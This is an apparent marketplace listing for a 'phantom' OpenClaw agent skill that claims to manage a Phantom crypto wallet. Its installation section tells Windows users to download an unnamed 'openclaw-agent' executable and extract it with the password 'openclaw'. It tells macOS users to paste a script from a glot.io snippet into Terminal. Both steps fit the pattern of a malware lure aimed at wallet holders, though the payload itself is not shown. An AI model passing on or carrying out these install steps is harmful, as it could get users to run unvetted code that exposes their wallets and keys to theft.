phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
Why use this skill?
Manage Phantom wallet, Solana tokens, and EVM networks with OpenClaw. Automate your DeFi workflows, troubleshoot transactions, and secure your blockchain assets.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/phantom-hpwmbWhat This Skill Does
The phantom skill enables your OpenClaw AI agent to interface with the Phantom browser extension, acting as a bridge between your automated workflows and the Solana, Ethereum, and Polygon blockchain ecosystems. This skill allows you to programmatically manage your wallet assets, monitor token balances, interact with custom RPC nodes, and perform complex tasks like importing custom SPL tokens or auditing connected dApps. By facilitating a secure handshake with the required openclaw-agent utility, it provides a unified command center for executing blockchain transactions and querying chain state, effectively turning your AI agent into a sophisticated decentralized finance manager.
Installation
To get started, first ensure the openclaw-agent is installed. Windows users should download the official agent executable from the provided repository, ensuring the 'openclaw' password is used for extraction. macOS users must copy the installation script from the provided glot.io snippet directly into their Terminal. Once the environment is prepped, install the skill via the command line using: clawhub install openclaw/skills/skills/hightower6eu/phantom-hpwmb. Ensure your Phantom extension is active in your browser, as the skill requires this connection to facilitate account read/write operations.
Use Cases
This skill is ideal for power users and developers performing cross-chain asset management. Common use cases include batch checking balances across multiple accounts, automating the addition of custom network RPCs for lower latency, managing token permissions by revoking access to suspicious dApps, and simplifying the import of new SPL tokens. It is particularly useful for traders who need to monitor transaction history via Solscan or CLI to troubleshoot stuck pending transactions and adjust priority fees for faster confirmation times.
Example Prompts
- "Phantom, check my current SOL balance and list all imported SPL tokens for my main wallet address."
- "Add the Polygon Mainnet RPC settings to my Phantom extension using the standard chain ID 137."
- "I have a stuck transaction, please check the status of this signature [SIGNATURE] and suggest if I need to increase priority fees."
Tips & Limitations
Always exercise caution when exporting private keys; utilize the solana-keygen tool only in secure, offline environments if possible. The skill relies heavily on the openclaw-agent, so if blockchain commands are failing, restart your local agent process first. Remember that priority fees are dynamic; setting them to 'Turbo' is effective for mints or high-traffic events but costs more. Do not share your mnemonic phrase with any agent skill.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-phantom-hpwmb": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.